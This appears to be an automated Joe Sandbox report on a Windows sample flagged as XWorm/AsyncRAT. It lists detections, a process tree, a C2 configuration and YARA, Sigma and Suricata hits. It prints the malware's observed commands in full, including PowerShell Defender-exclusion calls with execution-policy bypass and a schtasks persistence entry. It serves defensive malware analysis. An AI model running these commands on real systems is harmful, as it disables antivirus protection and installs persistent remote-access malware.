Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
80BvHOM51j.exe

Overview

General Information

Sample name:80BvHOM51j.exe
renamed because original name is a hash value
Original sample name:2b89bba8e264ad85ed07127f63cc7a711e05867525e4143edddb06dc9bbf2f08.exe
Analysis ID:1532625
MD5:2d4b0911cbb27ea9ef26908f3ce841ad
SHA1:04f30253d2a6982a9ac39b94750012ec2b9a1f5e
SHA256:2b89bba8e264ad85ed07127f63cc7a711e05867525e4143edddb06dc9bbf2f08
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the startup folder
Drops PE files to the user root directory
Drops script or batch files to the startup folder
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 80BvHOM51j.exe (PID: 2832 cmdline: "C:\Users\user\Desktop\80BvHOM51j.exe" MD5: 2D4B0911CBB27EA9EF26908F3CE841AD)
    • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • coonfart.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" MD5: A9D1FD427561A90037A112B99EDD9D14)
      • powershell.exe (PID: 3288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coonfart.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2656 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4852 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • coonfart.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" MD5: A9D1FD427561A90037A112B99EDD9D14)
  • Runtime Broker (PID: 7372 cmdline: "C:\Users\Public\Runtime Broker" MD5: A9D1FD427561A90037A112B99EDD9D14)
  • OpenWith.exe (PID: 7624 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 3716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 6656 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/LsuynkUz", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xe738:$s6: VirtualBox
  • 0x3b967:$s6: VirtualBox
  • 0xe696:$s8: Win32_ComputerSystem
  • 0x3b8c5:$s8: Win32_ComputerSystem
  • 0x10480:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x3d6af:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1051d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x3d74c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10632:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x3d861:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfaf0:$cnc4: POST / HTTP/1.1
  • 0x3cd1f:$cnc4: POST / HTTP/1.1

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]JoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]JoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd777:$s6: VirtualBox
      • 0xd6d5:$s8: Win32_ComputerSystem
      • 0xf361:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf3fe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf513:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xea5d:$cnc4: POST / HTTP/1.1
      C:\Users\Public\Runtime BrokerJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\Public\Runtime BrokerJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 4 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xc7f7:$s6: VirtualBox
            • 0xc755:$s8: Win32_ComputerSystem
            • 0xe3e1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xe47e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xe593:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xdadd:$cnc4: POST / HTTP/1.1
            00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xd577:$s6: VirtualBox
                • 0xd4d5:$s8: Win32_ComputerSystem
                • 0xf161:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xf1fe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xf313:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xe85d:$cnc4: POST / HTTP/1.1
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xd777:$s6: VirtualBox
                    • 0xd6d5:$s8: Win32_ComputerSystem
                    • 0xf361:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xf3fe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xf513:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xea5d:$cnc4: POST / HTTP/1.1
                    2.2.coonfart.exe.12d61a78.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      2.2.coonfart.exe.12d61a78.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        Click to see the 13 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Execution from Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Runtime Broker", CommandLine: "C:\Users\Public\Runtime Broker", CommandLine|base64offset|contains: , Image: C:\Users\Public\Runtime Broker, NewProcessName: C:\Users\Public\Runtime Broker, OriginalFileName: C:\Users\Public\Runtime Broker, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Public\Runtime Broker", ProcessId: 7372, ProcessName: Runtime Broker
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Runtime Broker, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ProcessId: 4320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', ProcessId: 3288, ProcessName: powershell.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker', ProcessId: 7780, ProcessName: powershell.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', ProcessId: 3288, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Runtime Broker, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ProcessId: 4320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Runtime Broker", CommandLine: "C:\Users\Public\Runtime Broker", CommandLine|base64offset|contains: , Image: C:\Users\Public\Runtime Broker, NewProcessName: C:\Users\Public\Runtime Broker, OriginalFileName: C:\Users\Public\Runtime Broker, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Public\Runtime Broker", ProcessId: 7372, ProcessName: Runtime Broker
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', ProcessId: 3288, ProcessName: powershell.exe
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\80BvHOM51j.exe, ProcessId: 2832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", ProcessId: 2656, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker", ProcessId: 2656, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', ProcessId: 3288, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3716, ProcessName: svchost.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Drops script at startup location
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\80BvHOM51j.exe, ProcessId: 2832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat

                        Malware Analysis System Evasion

                        barindex
                        Sigma detected: Powershell adding suspicious path to exclusion list
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, ParentProcessId: 4320, ParentProcessName: coonfart.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe', ProcessId: 3288, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-13T19:11:04.097315+020028032702Potentially Bad Traffic192.168.2.449730143.178.83.216443TCP
                        2024-10-13T19:11:05.359844+020028032702Potentially Bad Traffic192.168.2.449731143.178.83.216443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
